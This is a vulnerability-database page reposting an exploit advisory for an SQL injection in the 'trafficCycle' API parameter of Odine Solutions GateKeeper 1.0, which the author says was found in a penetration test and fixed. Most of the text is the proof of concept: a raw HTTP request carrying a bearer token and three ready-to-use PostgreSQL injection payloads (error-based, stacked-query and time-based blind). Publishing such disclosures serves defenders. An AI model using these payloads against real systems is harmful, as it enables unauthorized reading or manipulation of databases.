Wednesday, October 6, 2021

Odine Solutions GateKeeper 1.0 SQL Injection

# Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
# Date: 05.10.2021
# Exploit Author: Emel Basayar
# Vendor: Odine Solutions -
# Vendor Homepage:
# Version: 1.0
# Category: Webapps
# Tested on: Ubuntu 18 TLS
# Description : The vulnerability allows an attacker to inject sql commands from search section with 'trafficCycle' parameter.
# This vulnerability was discovered during the penetration testing and the vulnerability was fixed.

# PoC : SQLi :

GET /rass/api/v1/trafficCycle/98 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx
Connection: close

Parameter: #1* (URI)
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload:' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB

Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload:';SELECT PG_SLEEP(5)--

Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload:' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC
web application technology: Nginx
back-end DBMS: PostgreSQL


Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore